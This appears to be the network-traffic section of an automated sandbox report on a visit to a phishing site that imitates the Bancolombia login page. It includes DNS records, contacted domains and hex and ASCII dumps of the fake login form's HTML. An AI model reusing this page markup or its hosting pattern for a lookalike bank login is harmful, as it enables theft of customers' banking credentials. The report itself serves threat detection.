                                                                                                                          Oct 13, 2024 18:20:54.283252954 CEST138138192.168.2.4192.168.2.255
                                                                                                                          Oct 13, 2024 18:20:56.614458084 CEST53585101.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:16.413975000 CEST53556421.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:37.579776049 CEST53527731.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:39.410712004 CEST53623661.1.1.1192.168.2.4
                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                          Oct 13, 2024 18:20:42.090101004 CEST192.168.2.41.1.1.1c235(Port unreachable)Destination Unreachable
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Oct 13, 2024 18:20:39.639416933 CEST192.168.2.41.1.1.10xc8eeStandard query (0)bancolombia-seguridad-co.glitch.meA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:39.639632940 CEST192.168.2.41.1.1.10x9c23Standard query (0)bancolombia-seguridad-co.glitch.me65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:40.406183958 CEST192.168.2.41.1.1.10x768Standard query (0)newsinamerica.comA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:40.406363010 CEST192.168.2.41.1.1.10x331dStandard query (0)newsinamerica.com65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.368359089 CEST192.168.2.41.1.1.10x4b6dStandard query (0)bancolombia-seguridad-co.glitch.meA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.368665934 CEST192.168.2.41.1.1.10xb324Standard query (0)bancolombia-seguridad-co.glitch.me65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.440572023 CEST192.168.2.41.1.1.10x51adStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.440720081 CEST192.168.2.41.1.1.10x9b5bStandard query (0)api.ipify.org65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.441374063 CEST192.168.2.41.1.1.10x396fStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.441494942 CEST192.168.2.41.1.1.10xe13dStandard query (0)ipinfo.io65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.667702913 CEST192.168.2.41.1.1.10xa9e5Standard query (0)mtmarketing.coA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.667855024 CEST192.168.2.41.1.1.10xf727Standard query (0)mtmarketing.co65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.823396921 CEST192.168.2.41.1.1.10xf57cStandard query (0)newsinamerica.comA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.823523045 CEST192.168.2.41.1.1.10xd4ccStandard query (0)newsinamerica.com65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.113089085 CEST192.168.2.41.1.1.10x5b95Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.113240004 CEST192.168.2.41.1.1.10xb298Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.126774073 CEST192.168.2.41.1.1.10xe952Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.126908064 CEST192.168.2.41.1.1.10x9966Standard query (0)ipinfo.io65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.322078943 CEST192.168.2.41.1.1.10xa772Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.322148085 CEST192.168.2.41.1.1.10xada6Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.989248991 CEST192.168.2.41.1.1.10x4594Standard query (0)secure.quantserve.comA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.989377975 CEST192.168.2.41.1.1.10x149eStandard query (0)secure.quantserve.com65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:43.579413891 CEST192.168.2.41.1.1.10x497aStandard query (0)mtmarketing.coA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:43.579550982 CEST192.168.2.41.1.1.10x7f4aStandard query (0)mtmarketing.co65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.200505018 CEST192.168.2.41.1.1.10x5950Standard query (0)rules.quantcount.comA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.200819969 CEST192.168.2.41.1.1.10xe1a1Standard query (0)rules.quantcount.com65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.496129036 CEST192.168.2.41.1.1.10x6315Standard query (0)secure.quantserve.comA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.496349096 CEST192.168.2.41.1.1.10x2195Standard query (0)secure.quantserve.com65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:45.680454969 CEST192.168.2.41.1.1.10xf80aStandard query (0)rules.quantcount.comA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:45.680671930 CEST192.168.2.41.1.1.10x514eStandard query (0)rules.quantcount.com65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:45.684071064 CEST192.168.2.41.1.1.10xc81fStandard query (0)pixel.quantserve.comA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:45.684221029 CEST192.168.2.41.1.1.10x8313Standard query (0)pixel.quantserve.com65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:46.762578011 CEST192.168.2.41.1.1.10x98f7Standard query (0)pixel.quantserve.comA (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:46.762968063 CEST192.168.2.41.1.1.10xc4fbStandard query (0)pixel.quantserve.com65IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Oct 13, 2024 18:20:39.660646915 CEST1.1.1.1192.168.2.40xc8eeNo error (0)bancolombia-seguridad-co.glitch.me3.219.195.73A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:39.660646915 CEST1.1.1.1192.168.2.40xc8eeNo error (0)bancolombia-seguridad-co.glitch.me52.44.191.148A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:40.589973927 CEST1.1.1.1192.168.2.40x768No error (0)newsinamerica.com173.231.197.227A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.378402948 CEST1.1.1.1192.168.2.40x4b6dNo error (0)bancolombia-seguridad-co.glitch.me3.219.195.73A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.378402948 CEST1.1.1.1192.168.2.40x4b6dNo error (0)bancolombia-seguridad-co.glitch.me52.44.191.148A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.447278976 CEST1.1.1.1192.168.2.40x51adNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.447278976 CEST1.1.1.1192.168.2.40x51adNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.447278976 CEST1.1.1.1192.168.2.40x51adNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.447977066 CEST1.1.1.1192.168.2.40x396fNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.447988987 CEST1.1.1.1192.168.2.40x9b5bNo error (0)api.ipify.org65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.830868006 CEST1.1.1.1192.168.2.40xf57cNo error (0)newsinamerica.com173.231.197.227A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:41.981199980 CEST1.1.1.1192.168.2.40xa9e5No error (0)mtmarketing.co162.214.111.33A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.120757103 CEST1.1.1.1192.168.2.40x5b95No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.120757103 CEST1.1.1.1192.168.2.40x5b95No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.120757103 CEST1.1.1.1192.168.2.40x5b95No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.122647047 CEST1.1.1.1192.168.2.40xb298No error (0)api.ipify.org65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.133585930 CEST1.1.1.1192.168.2.40xe952No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.328789949 CEST1.1.1.1192.168.2.40xada6No error (0)www.google.com65IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.328857899 CEST1.1.1.1192.168.2.40xa772No error (0)www.google.com172.217.16.196A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.996263027 CEST1.1.1.1192.168.2.40x149eNo error (0)secure.quantserve.com2kpixel.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.996263027 CEST1.1.1.1192.168.2.40x149eNo error (0)2kpixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.996865988 CEST1.1.1.1192.168.2.40x4594No error (0)secure.quantserve.com2kpixel.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.996865988 CEST1.1.1.1192.168.2.40x4594No error (0)2kpixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.996865988 CEST1.1.1.1192.168.2.40x4594No error (0)global.px.quantserve.com91.228.74.159A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.996865988 CEST1.1.1.1192.168.2.40x4594No error (0)global.px.quantserve.com91.228.74.244A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.996865988 CEST1.1.1.1192.168.2.40x4594No error (0)global.px.quantserve.com91.228.74.166A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:42.996865988 CEST1.1.1.1192.168.2.40x4594No error (0)global.px.quantserve.com91.228.74.200A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.099806070 CEST1.1.1.1192.168.2.40x497aNo error (0)mtmarketing.co162.214.111.33A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.207593918 CEST1.1.1.1192.168.2.40x5950No error (0)rules.quantcount.comd2fashanjl7d9f.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.207593918 CEST1.1.1.1192.168.2.40x5950No error (0)d2fashanjl7d9f.cloudfront.net18.66.102.15A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.207593918 CEST1.1.1.1192.168.2.40x5950No error (0)d2fashanjl7d9f.cloudfront.net18.66.102.57A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.207593918 CEST1.1.1.1192.168.2.40x5950No error (0)d2fashanjl7d9f.cloudfront.net18.66.102.66A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.207593918 CEST1.1.1.1192.168.2.40x5950No error (0)d2fashanjl7d9f.cloudfront.net18.66.102.121A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.207943916 CEST1.1.1.1192.168.2.40xe1a1No error (0)rules.quantcount.comd2fashanjl7d9f.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.503547907 CEST1.1.1.1192.168.2.40x6315No error (0)secure.quantserve.com2kpixel.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.503547907 CEST1.1.1.1192.168.2.40x6315No error (0)2kpixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.503547907 CEST1.1.1.1192.168.2.40x6315No error (0)global.px.quantserve.com91.228.74.200A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.503547907 CEST1.1.1.1192.168.2.40x6315No error (0)global.px.quantserve.com91.228.74.244A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.503547907 CEST1.1.1.1192.168.2.40x6315No error (0)global.px.quantserve.com91.228.74.166A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.503547907 CEST1.1.1.1192.168.2.40x6315No error (0)global.px.quantserve.com91.228.74.159A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.504172087 CEST1.1.1.1192.168.2.40x2195No error (0)secure.quantserve.com2kpixel.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:44.504172087 CEST1.1.1.1192.168.2.40x2195No error (0)2kpixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:45.688349009 CEST1.1.1.1192.168.2.40xf80aNo error (0)rules.quantcount.comd2fashanjl7d9f.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:45.688349009 CEST1.1.1.1192.168.2.40xf80aNo error (0)d2fashanjl7d9f.cloudfront.net18.66.102.66A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:45.688349009 CEST1.1.1.1192.168.2.40xf80aNo error (0)d2fashanjl7d9f.cloudfront.net18.66.102.15A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:45.688349009 CEST1.1.1.1192.168.2.40xf80aNo error (0)d2fashanjl7d9f.cloudfront.net18.66.102.121A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:45.688349009 CEST1.1.1.1192.168.2.40xf80aNo error (0)d2fashanjl7d9f.cloudfront.net18.66.102.57A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:45.688714027 CEST1.1.1.1192.168.2.40x514eNo error (0)rules.quantcount.comd2fashanjl7d9f.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:45.691283941 CEST1.1.1.1192.168.2.40xc81fNo error (0)pixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:45.691283941 CEST1.1.1.1192.168.2.40xc81fNo error (0)global.px.quantserve.com91.228.74.166A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:45.691283941 CEST1.1.1.1192.168.2.40xc81fNo error (0)global.px.quantserve.com91.228.74.244A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:45.691283941 CEST1.1.1.1192.168.2.40xc81fNo error (0)global.px.quantserve.com91.228.74.200A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:45.691283941 CEST1.1.1.1192.168.2.40xc81fNo error (0)global.px.quantserve.com91.228.74.159A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:45.691975117 CEST1.1.1.1192.168.2.40x8313No error (0)pixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:46.769715071 CEST1.1.1.1192.168.2.40x98f7No error (0)pixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:46.769715071 CEST1.1.1.1192.168.2.40x98f7No error (0)global.px.quantserve.com91.228.74.200A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:46.769715071 CEST1.1.1.1192.168.2.40x98f7No error (0)global.px.quantserve.com91.228.74.244A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:46.769715071 CEST1.1.1.1192.168.2.40x98f7No error (0)global.px.quantserve.com91.228.74.166A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:46.769715071 CEST1.1.1.1192.168.2.40x98f7No error (0)global.px.quantserve.com91.228.74.159A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:46.769746065 CEST1.1.1.1192.168.2.40xc4fbNo error (0)pixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:52.000178099 CEST1.1.1.1192.168.2.40xe9b9No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:52.000178099 CEST1.1.1.1192.168.2.40xe9b9No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:53.421830893 CEST1.1.1.1192.168.2.40xb605No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:20:53.421830893 CEST1.1.1.1192.168.2.40xb605No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:21:05.523581982 CEST1.1.1.1192.168.2.40x262fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:21:05.523581982 CEST1.1.1.1192.168.2.40x262fNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:21:31.489059925 CEST1.1.1.1192.168.2.40xda5cNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:21:31.489059925 CEST1.1.1.1192.168.2.40xda5cNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:21:51.101057053 CEST1.1.1.1192.168.2.40x7bb3No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Oct 13, 2024 18:21:51.101057053 CEST1.1.1.1192.168.2.40x7bb3No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                          • bancolombia-seguridad-co.glitch.me
                                                                                                                            • newsinamerica.com
                                                                                                                            • ipinfo.io
                                                                                                                            • api.ipify.org
                                                                                                                            • mtmarketing.co
                                                                                                                            • secure.quantserve.com
                                                                                                                            • rules.quantcount.com
                                                                                                                            • pixel.quantserve.com
                                                                                                                          • fs.microsoft.com
                                                                                                                          • otelrules.azureedge.net
                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.4497363.219.195.73802316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 13, 2024 18:20:39.666907072 CEST449OUTGET / HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:40.187155962 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:40 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Content-Length: 10017
                                                                                                                          Connection: keep-alive
                                                                                                                          x-amz-id-2: Ec/q6s/l/hBFzaNemrb5l1Yr2HXxzhjr9cgtdrSIdc2eLKqcfFNQBOP+eMrXQ7Foj0U4ahsu+ns=
                                                                                                                          x-amz-request-id: 44N0DPS5VQM2D96P
                                                                                                                          last-modified: Sat, 12 Oct 2024 23:58:07 GMT
                                                                                                                          etag: "d6a0fb8ca650d01903b7a0464c1c5d7a"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          cache-control: no-cache
                                                                                                                          x-amz-version-id: SXqxOc48znyQIm4rS4Mftte6m7NtPPzS
                                                                                                                          accept-ranges: bytes
                                                                                                                          server: AmazonS3
                                                                                                                          Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 49 6e 73 65 72 74 65 64 20 62 79 20 6d 69 61 72 72 6f 62 61 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 6a 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 29 2c 64 6c 3d 6c 21 3d 27 64 61 74 61 4c 61 79 65 72 27 3f 27 26 6c 3d 27 2b 6c 3a 27 27 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 6a 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 6d 2e 6a 73 3f 69 64 3d 27 [TRUNCATED]
                                                                                                                          Data Ascii: <html><head> ... Inserted by miarroba --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-T2VG59');</script> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE10"> <meta name="apple-itunes-app" content="app-id=284847138"><link rel="stylesheet" href=".
                                                                                                                          Oct 13, 2024 18:20:40.187179089 CEST1236INData Raw: 2f 68 68 68 68 68 68 5f 66 69 6c 65 73 2f 62 61 63 74 6f 75 63 68 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 68 68 68 68 68 68 5f 66 69 6c 65 73 2f 74 6f 6f 6c 62 61 72 2e 63 73
                                                                                                                          Data Ascii: /hhhhhh_files/bactouch.css"><link rel="stylesheet" href="./hhhhhh_files/toolbar.css"><link rel="stylesheet" href="./hhhhhh_files/bact_listview.css"><link rel="stylesheet" href="./hhhhhh_files/footer.css"><script src="./hhhhhh_files/authhub-hel
                                                                                                                          Oct 13, 2024 18:20:40.187194109 CEST1236INData Raw: 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2e 2f 61 72 63 68 69 76 6f 73 2f 75 69 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22
                                                                                                                          Data Ascii: "stylesheet" type="text/css"> <link href="./archivos/ui.css" media="all" rel="stylesheet" type="text/css"> <link href="./archivos/jquery-ui.css" media="all" rel="stylesheet" type="text/css"> <link href="./archivos/showLoading.css"
                                                                                                                          Oct 13, 2024 18:20:40.187207937 CEST1236INData Raw: 73 74 49 6e 22 20 63 6c 61 73 73 3d 22 6d 75 61 2d 74 69 74 6c 65 2d 74 65 78 74 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: stIn" class="mua-title-text" style="padding-top: 10px !important"> <div> <div class="timeText">Fecha y hora actual:</div> <span id="jclock1" class="lastVisitedText">
                                                                                                                          Oct 13, 2024 18:20:40.187223911 CEST1236INData Raw: 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 6e 65 6c 20 70 61 6e 65 6c 2d 70 72 69 6d 61 72 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 75 61 2d 70 61 6e 65 6c 2d 62 6f 64 79 22 3e 0a 20 20 20
                                                                                                                          Data Ascii: <div class="panel panel-primary"> <div class="mua-panel-body"> <div class="row"> <div class="col-xs-12 col-sm-5 col-md-4"> <div class="panel_general mua-panel_general">
                                                                                                                          Oct 13, 2024 18:20:40.187238932 CEST1236INData Raw: 61 6d 65 3d 22 74 69 70 6f 70 65 72 22 20 63 6c 61 73 73 3d 22 6d 75 61 2d 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 6d 75 61 5f 73 76 70 5f 63 6f 6e 74 72 6f 6c 5f 75 73 65 72 6e 61 6d 65 20 6d 75 61 2d 69 6e 70 75 74 2d 69 63 6f 6e 22 3e 0a 09 09
                                                                                                                          Data Ascii: ame="tipoper" class="mua-form-control mua_svp_control_username mua-input-icon"> <option value="persona">Persona</option> <option value="empresa">Empresa</option> </select>
                                                                                                                          Oct 13, 2024 18:20:40.187256098 CEST776INData Raw: 65 6e 74 29 22 20 6f 6e 63 68 61 6e 67 65 3d 22 74 72 69 6d 28 64 6f 63 75 6d 65 6e 74 2e 6c 6f 67 69 6e 55 73 65 72 46 6f 72 6d 2e 75 73 65 72 6e 61 6d 65 29 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: ent)" onchange="trim(document.loginUserForm.username)"> <span class="mua-icon-user"></span> </div> </div> </div> </div>
                                                                                                                          Oct 13, 2024 18:20:40.187271118 CEST1236INData Raw: 50 61 73 6f 20 61 20 70 61 73 6f 20 70 61 72 61 20 72 65 63 6f 72 64 61 72 20 74 75 20 75 73 75 61 72 69 6f 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: Paso a paso para recordar tu usuario</a> </p> <p> <a href="">Problemas para conectarte?</a> </p> </div> </div>
                                                                                                                          Oct 13, 2024 18:20:40.187289000 CEST1101INData Raw: 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: class="row"> <div class="col-xs-12 col-sm-12 col-md-12"> <p class="mua-footer"> Sucursal Telefonica: Bogota (57) 60 1 343 00 00 - Medellin (57) 60 4 510 90 00 - Cali (57) 60 2
                                                                                                                          Oct 13, 2024 18:20:40.271516085 CEST380OUTGET /hhhhhh_files/bactouch.css HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:40.399987936 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:40 GMT
                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
